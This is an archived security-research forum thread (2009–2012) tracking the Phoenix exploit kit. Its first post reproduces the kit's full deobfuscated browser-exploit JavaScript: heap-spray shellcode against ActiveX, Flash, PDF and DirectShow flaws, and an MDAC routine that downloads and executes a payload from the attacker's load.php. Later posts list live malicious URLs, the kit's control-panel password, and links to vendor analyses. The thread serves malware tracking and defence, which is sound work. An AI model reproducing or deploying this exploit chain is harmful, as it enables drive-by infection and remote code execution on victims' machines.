Malware Domain List

Malware Related => Malware Analysis => Topic started by: WIEx on September 15, 2009, 06:27:29 pm

Title: Phoenix exploit's kit
Post by: WIEx on September 15, 2009, 06:27:29 pm
Description

http://translate.google.ru/translate?prev=hp&hl=ru&js=y&u=http%3A%2F%2Fwww.hack-info.ru%2Fshowthread.php%3Fp%3D311312&sl=auto&tl=en&history_state0=

Screenshot

(http://img182.imageshack.us/img182/9150/1111n.png)

Control panel

Code: [Select]
http://www.stiggba.com/phoenix/statistics.php
Exploits

Code: [Select]
http://www.stiggba.com/phoenix/index.php

deobfuscated script

Code: [Select]
function AOL()
{
    try
    {
        var IWinAmpActiveX = document.createElement('object');
        IWinAmpActiveX.classid = 'clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6';
        IWinAmpActiveX.codebase = "http://pdl.stream.aol.com/downloads/aol/unagi/ampx_en_dl.cab";
        shellcode = unescape("%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u732f%u6974%u6767%u6162%u632e%u6d6f%u702f%u6f68%u6e65%u7869%u6c2f%u616f%u2e64%u6870%u3f70%u3d69%u3731%u9000");
        bigblock = unescape("%u0c0c%u0c0c");
        headersize = 20;
        slackspace = headersize + shellcode.length;
        while (bigblock.length < slackspace) {
            bigblock += bigblock;
        }
        fillblock = bigblock.substring(0, slackspace);
        block = bigblock.substring(0, bigblock.length - slackspace);
        while (block.length + slackspace < 0x40000) {
            block = block + block + fillblock;
        }
        memory = new Array();
        for (i = 0; i < 666; i++) {
            memory[i] = block + shellcode;
        }
        var bof;
        for (i = 0; i < 1400; i++) {
            bof = bof + unescape("%ff");
        }
        for (i = 0; i < 1000; i++) {
            bof = bof + unescape("%0c");
        }
        IWinAmpActiveX.ConvertFile(bof, 1, 1, 1, 1, 1);
        IWinAmpActiveX.ConvertFile(bof, 1, 1, 1, 1, 1);
        IWinAmpActiveX.ConvertFile(bof, 1, 1, 1, 1, 1);
        IWinAmpActiveX.ConvertFile(bof, 1, 1, 1, 1, 1);
    }
    catch (e) {
        JAVA();
        setTimeout('DSHOW()', 3000);
    }
}
function FLASH10()
{
    try
    {
        sv = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.10').GetVariable('$version');
        if ((sv == 'WIN 10,0,12,36') || (sv == 'WIN 10,0,22,87'))
        {
            var swf = document.createElement('iframe');
            swf.setAttribute('src', 'files/10.swf');
            swf.setAttribute('width', 18);
            swf.setAttribute('height', 18);
            document.body.appendChild(swf);
            var memory;
            var nop = unescape('%u0808%u0808');
            var SC = unescape('%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u732f%u6974%u6767%u6162%u632e%u6d6f%u702f%u6f68%u6e65%u7869%u6c2f%u616f%u2e64%u6870%u3f70%u3d69%u3831%u9000');
            while (nop.length <= 0x10000 / 2) {
                nop += nop;
            }
            nop = nop.substring(0, 0x10000 / 2 - SC.length);
            memory = new Array();
            for (ass8995 = 0; ass8995 < 0x600; ass8995++) {
                memory[ass8995] = nop + SC;
            }
        }
        else {
            AOL();
        }
    }
    catch (e) {
        AOL();
    }
}
function DSHOW()
{
    var b = unescape('%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u732f%u6974%u6767%u6162%u632e%u6d6f%u702f%u6f68%u6e65%u7869%u6c2f%u616f%u2e64%u6870%u3f70%u3d69%u3031%u9000');
    var c = unescape('%u9090%u9090');
    var d = 20;
    var e = d + b.length;
    while (c.length < e) {
        c += c;
    }
    var f = c.substring(0, e);
    var g = c.substring(0, c.length - e);
    while (g.length + e < 0x70000) {
        g = g + g + f;
    }
    var h = new Array();
    for (i = 0; i < 350; i++) {
        h[i] = g + b
    }
    var i = document.createElement('object');
    j.appendChild(i);
    i.width = '1';
    i.height = '1';
    i.data = './img.png';
    i.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
}
function MDAC()
{
    var p = document.createElement('object');
    p.setAttribute('id', p);
    p.setAttribute('classid', 'clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
    try
    {
        var q = p.CreateObject('msxml2.XMLHTTP', '');
        var r = p.CreateObject('Shell.Application', '');
        var s = p.CreateObject('adodb.stream', '');
        try
        {
            s.type = 1;
            q.open('GET', 'http://stiggba.com/phoenix/load.php?i=1', false);
            q.send();
            s.open();
            s.Write(q.responseBody);
            var t = './/..//file.exe';
            s.SaveToFile(t, 2);
            s.Close();
        }
        catch (e) {
            SWF();
        }
        try {
            r.shellexecute(t);
        }
        catch (e) {
            SWF();
        }
    }
    catch (e) {
        SWF();
    }
}
function SNAP()
{
    function var1()
    {
        for (var2 = 2, var3 = ''; var2 <= 26; var2++)
        {
            var3 = String.fromCharCode(65 + var2);
            var var4 = new Image();
            var4.src = 'res://' + var3 + ':\\' + 'Program Files' + '\\' + 'Outlook Express' + '\\' + 'msoeres.dll' + '/#2/1';
            if (var4.height == 59) {
                break;
            }
            var4 = '';
        }
        return var3;
    }
    function var5(url)
    {
        var var3 = var1();
        if (var3 == '[') {
            FLASH10();
            return;
        }
        try {
            var var6 = new ActiveXObject('snpvw.Snapshot Viewer Control.1');
        }
        catch (e) {
            if (var6 != '[object]') {
                FLASH10();
                return;
            }
        }
        var6.SnapshotPath = url;
        try
        {
            var6.CompressedPath = var3 + ':\\' + 'Program Files' + '\\' + 'Outlook Express' + '\\' + 'wab.exe';
            var6.PrintSnapshot();
        }
        catch (e) {
            FLASH10();
        };
        var var7 = setInterval(function ()
        {
            if (var6.readyState == 4) {
                clearInterval(var7);
                window.location = 'ldap://';
            }
        }, 3000);
    }
    var5('http://stiggba.com/phoenix/load.php?i=2');
}
function SWF()
{
    try
    {
        sv = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.9').GetVariable('$version');
        if ((sv == 'WIN 9,0,115,0') || (sv == 'WIN 9,0,16,0') || (sv == 'WIN 9,0,28,0') || (sv == 'WIN 9,0,45,0') || (sv == 'WIN 9,0,47,0') || (sv == 'WIN 9,0,64,0'))
        {
            var swf = document.createElement("iframe");
            swf.setAttribute("src", "files/9i.swf");
            swf.setAttribute("width", 1);
            swf.setAttribute("height", 1);
            document.body.appendChild(swf);
        }
        else {
            PDF();
        }
    }
    catch (e) {
        PDF();
    }
}
function JAVA()
{
    document.write("<applet code = 'Show.class' width='100' height='100'>");
}
function SHOWPDF(fn)
{
    wind = window;
    while (wind.parent != wind) {
        wind = wind.parent;
    }
    wind.location = fn;
}
function PDF()
{
    try
    {
        document.write('<OBJECT id=Pdf1 height=0 width=0 classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></OBJECT>');
        var lv = Pdf1.GetVersions();
        lv = lv.split(',');
        lv = lv[4].split('=');
        lv = lv[1];
        sv = lv.split('.');
        sv = sv[0];
        if ((lv == '9.0.0') || (lv == '8.1.2')) {
            SHOWPDF('files/geticon.pdf');
        }
        if ( (sv <= 8) && (sv >= 6) ) {
            if (lv == '7.1.0') {
                SHOWPDF('files/printf.pdf');
            }
            else {
                SHOWPDF('files/collab.pdf');
            }
        }
        else {
            SNAP();
        }
    }
    catch (e) {
        SNAP();
    }
}
MDAC();

/EDIT by SysAdMini Wepawet link added
http://wepawet.cs.ucsb.edu/view.php?hash=0299f11465b1f9188d9ed2fe5b4841a1&type=js
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on September 16, 2009, 07:07:06 am
Code: [Select]
lifecounter.cn/p/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=de0bcbf8b53f7532de90f0ee6eb95f98&t=1253084633&type=js


Code: [Select]
stikkso.com/phoenix/index.phphttp://wepawet.cs.ucsb.edu/view.php?type=js&hash=052c3e415ac356510424f2f36edb12f7&t=1248796478
Title: Re: Phoenix exploit's kit
Post by: WIEx on September 16, 2009, 01:24:59 pm
SysAdMini,  ;)

Control Panel

Quote
stikkso.com/phoenix/statistics.php

password - parrot
Title: Re: Phoenix exploit's kit
Post by: h4h4h4h4 on September 16, 2009, 05:04:23 pm
SysAdMini,  ;)

Control Panel

Quote
stikkso.com/phoenix/statistics.php

password - parrot

thats cool.  Why would they be so stupid to not change there password?  Im guessing thats the default password.  Looks like we can go in and reset there stats and mess it up if we wanted to LOL.
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on September 16, 2009, 05:18:13 pm
thats cool.  Why would they be so stupid to not change there password?  Im guessing thats the default password.  Looks like we can go in and reset there stats and mess it up if we wanted to LOL.

Please don't reset any stats. Stats are interesting for researchers.
Title: Re: Phoenix exploit's kit
Post by: h4h4h4h4 on September 16, 2009, 09:32:52 pm
thats cool.  Why would they be so stupid to not change there password?  Im guessing thats the default password.  Looks like we can go in and reset there stats and mess it up if we wanted to LOL.

Please don't reset any stats. Stats are interesting for researchers.

Yep sounds good.
Title: Re: Phoenix exploit's kit
Post by: cronos713 on October 24, 2009, 01:43:44 am
More information in my blog ;)
http://mipistus.blogspot.com/2009/09/phoenix-exploits-kit-otra-alternativa.html

and in English
http://evilfingers.blogspot.com/2009/09/phoenix-exploits-kit-another.html
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on August 04, 2010, 06:15:46 am
Phoenix Exploit Kit 2.0
http://www.m86security.com/labs/traceitem.asp?article=1427
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on August 18, 2010, 06:37:57 pm
State of the art in Phoenix Exploit's Kit

http://malwareint.blogspot.com/2010/08/state-of-art-in-phoenix-exploits-kit.html

http://www.malwareint.com/docs/pek-analysis-en.pdf
Title: Re: Phoenix exploit's kit
Post by: detro on August 24, 2010, 04:02:42 pm
Current Phoenix exploit kit campaigns being pushed today,

hxxp://nevoex65eo.com/ab/tmp/des.jar < I have currently been unable to locate the control panel or payload yet but here is the java sploit

 and

hxxp://79.135.152.217/a/tmp/des.jar which is currently already listed on MDL here http://www.malwaredomainlist.com/mdl.php?search=79.135.152.217&colsearch=All&quantity=50

It appears these are going out in tandem as i am seeing them appear on multiple different client networks simultaneously.


t's have been converted to x's to protect the innocent.
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on September 03, 2010, 09:06:51 pm
Phoenix Exploit Kit's Random Access Obfuscation
http://community.websense.com/blogs/securitylabs/archive/2010/08/31/random-access-obfuscation.aspx
Title: Re: Phoenix exploit's kit
Post by: crunchtime on September 07, 2010, 03:35:10 am
Yet another libtiff.pdf sample from this kit:

hxxtp://ethdem.com/ddt/tmp/libtiff.pdf

Some info on this domain is already on list: http://www.malwaredomainlist.com/mdl.php?search=ethdem.com&colsearch=All&quantity=50

*Edit*
One more: hxxp://www.finworldonline.com/news/tmp/libtiff.pdf
Title: Re: Phoenix exploit's kit
Post by: crunchtime on September 08, 2010, 04:24:16 pm
One more sample:

hxxp://mypetitebusiness.org/2/tmp/libtiff.pdf
Title: Re: Phoenix exploit's kit
Post by: GmG on October 04, 2010, 01:21:56 pm
New phoenix ?
Code: [Select]
gotrue.cz.cc/tk/

Code: [Select]
gotrue.cz.cc/tk/u.asx

It's equal

http://popunder777.com/pek/tmp/u.asx

Title: Re: Phoenix exploit's kit
Post by: pstash on November 17, 2010, 10:33:04 pm
Anyone know where I could find a readme.txt file for this kit?  I have a couple of versions of the kit and want to do some analysis on them.  The readme file in one of the versions is all screwy, probably because it was written in Russian before.
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on December 27, 2010, 08:15:55 pm
Installation Protection Mechanisms of Phoenix Exploit's Kit
http://community.websense.com/blogs/securitylabs/archive/2010/12/27/installation-protection-mechanisms-of-phoenix-exploit-s-kit.aspx?cmpid=sltw
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on February 05, 2011, 04:40:35 pm
Now Exploiting: Phoenix Exploit Kit Version 2.5
http://blog.trendmicro.com/now-exploiting-phoenix-exploit-kit-version-2-5/
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on May 24, 2011, 05:22:41 pm
Version 2.7 announced
http://translate.google.co.jp/translate?js=n&prev=_t&hl=en&ie=UTF-8&layout=2&eotf=1&sl=auto&tl=en&u=http://scriptkiddiesec.blogspot.com/2011/05/phoenix-exploit-27.html

Quote
----------- V2 .7 ------------------------------------

  • Added new exploit JAVA TRUST under JRE / JDK versions 1.6.0, 1.6.0_23
  • Removed all the obsolete and palevnyh currently exploits: HCP, FLASH 9, FLASH10, IEPEERS, IE CSS
  • The chain sploytov rewritten and meets maximum performance
Title: Re: Phoenix exploit's kit
Post by: GmG on May 24, 2011, 08:10:11 pm
http://wepawet.iseclab.org/view.php?hash=79a210bbed2651d8d5575416c0423dec&t=1303635027&type=js

.cc/27/btfpkrfwcqgvxqdrgp.php

and

Code: [Select]
http://1160.mosesigses.in/?n=1160
http://sanstag.com/adv/astr/dmxtfzysjq.php

http://urlquery.net/report.php?id=2587
http://wepawet.iseclab.org/view.php?hash=24ee89d61a2041980910ae0580f1e3ed&t=1306268077&type=js
Title: Re: Phoenix exploit's kit
Post by: GmG on June 05, 2011, 05:20:47 pm
Phoenix Exploit Kit (2.7) continues to be updated
http://labs.m86security.com/2011/06/phoenix-exploit-kit-2-7-continues-to-be-updated/
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on May 01, 2012, 06:01:42 pm
Phoenix Exploit's Kit 3.1
http://xylibox.blogspot.de/2012/05/phoenix-exploits-kit-31-full.html

Quote
We are pleased to present new version of pack 3.1!

-----------v3.1------------------------------------

  • Added new JAVA ATOMIC exploit of JRE 1.6.0-1.6.0_30, 1.7.0-1.7.0_2 for FF/IE/OPERA. Sufficiently increased exploitation success.
  • JAVA TC and JAVA RHINO combined in one .jar file
  • added 4 activation variants:



1)JAVA with version determination, PDF with version determination before load
2)JAVA without version determination, PDF with version determination before load
3)JAVA with version determination, PDF without version determination before load
4)JAVA without version determination, PDF with version determination before load

This flexible system allows for longer not to kill traffic sources (actual for iframe traffic) or conversely with little sacrifice of traffic sources raise exploitation success (actual for Pop up traffic)

  • The exploits delivery chain has been rewritten to be up to date, has been removed JAVA SMB, JAVA TRUST, FLASH 10 because they are no longer actual. As a consequence, there was easy to configure and install - no-Apache on port 8080 and SMB configs.